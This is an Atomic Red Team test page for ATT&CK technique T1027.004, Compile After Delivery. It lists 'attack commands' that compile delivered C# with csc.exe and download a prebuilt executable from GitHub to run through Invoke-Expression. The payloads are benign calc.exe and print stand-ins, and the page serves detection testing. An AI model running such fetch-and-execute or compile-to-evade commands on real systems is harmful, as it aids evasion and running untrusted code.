Skip to content

Latest commit

 

History

History
105 lines (63 loc) · 3.75 KB

T1027.004.md

File metadata and controls

105 lines (63 loc) · 3.75 KB

T1027.004 - Compile After Delivery

Description from ATT&CK

Adversaries may attempt to make payloads difficult to discover and analyze by delivering files to victims as uncompiled code. Text-based source code files may subvert analysis and scrutiny from protections targeting executables/binaries. These payloads will need to be compiled before execution; typically via native utilities such as csc.exe or GCC/MinGW.(Citation: ClearSky MuddyWater Nov 2018)

Source code payloads may also be encrypted, encoded, and/or embedded within other files, such as those delivered as a Phishing. Payloads may also be delivered in formats unrecognizable and inherently benign to the native OS (ex: EXEs on macOS/Linux) before later being (re)compiled into a proper executable binary with a bundled compiler and execution framework.(Citation: TrendMicro WindowsAppMac)

Atomic Tests


Atomic Test #1 - Compile After Delivery using csc.exe

Compile C# code using csc.exe binary used by .NET Upon execution an exe named T1027.004.exe will be placed in the temp folder

Supported Platforms: Windows

Inputs:

Name Description Type Default Value
output_file Output compiled binary Path C:\Windows\Temp\T1027.004.exe
input_file C# code that launches calc.exe from a hidden cmd.exe Window Path PathToAtomicsFolder\T1027.004\src\calc.cs

Attack Commands: Run with command_prompt!

C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe /out:#{output_file} #{input_file}

Cleanup Commands:

del #{output_file} >nul 2>&1

Dependencies: Run with powershell!

Description: C# file must exist on disk at specified location (#{input_file})
Check Prereq Commands:
if (Test-Path #{input_file}) {exit 0} else {exit 1}
Get Prereq Commands:
New-Item -Type Directory (split-path #{input_file}) -ErrorAction ignore | Out-Null
Invoke-WebRequest "https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.004/src/calc.cs" -OutFile "#{input_file}"


Atomic Test #2 - Dynamic C# Compile

When C# is compiled dynamically, a .cmdline file will be created as a part of the process. Certain processes are not typically observed compiling C# code, but can do so without touching disk. This can be used to unpack a payload for execution. The exe file that will be executed is named as T1027.004_DynamicCompile.exe is containted in the 'bin' folder of this atomic, and the source code to the file is in the 'src' folder. Upon execution, the exe will print 'T1027.004 Dynamic Compile'.

Supported Platforms: Windows

Inputs:

Name Description Type Default Value
input_file exe program containing dynamically compiled C# code Path PathToAtomicsFolder\T1027.004\bin\T1027.004_DynamicCompile.exe

Attack Commands: Run with powershell!

Invoke-Expression #{input_file}

Dependencies: Run with powershell!

Description: exe file must exist on disk at specified location (#{input_file})
Check Prereq Commands:
if (Test-Path #{input_file}) {exit 0} else {exit 1}
Get Prereq Commands:
Invoke-WebRequest https://github.com/redcanaryco/atomic-red-team/raw/master/atomics/T1027.004/bin/T1027.004_DynamicCompile.exe -OutFile #{input_file}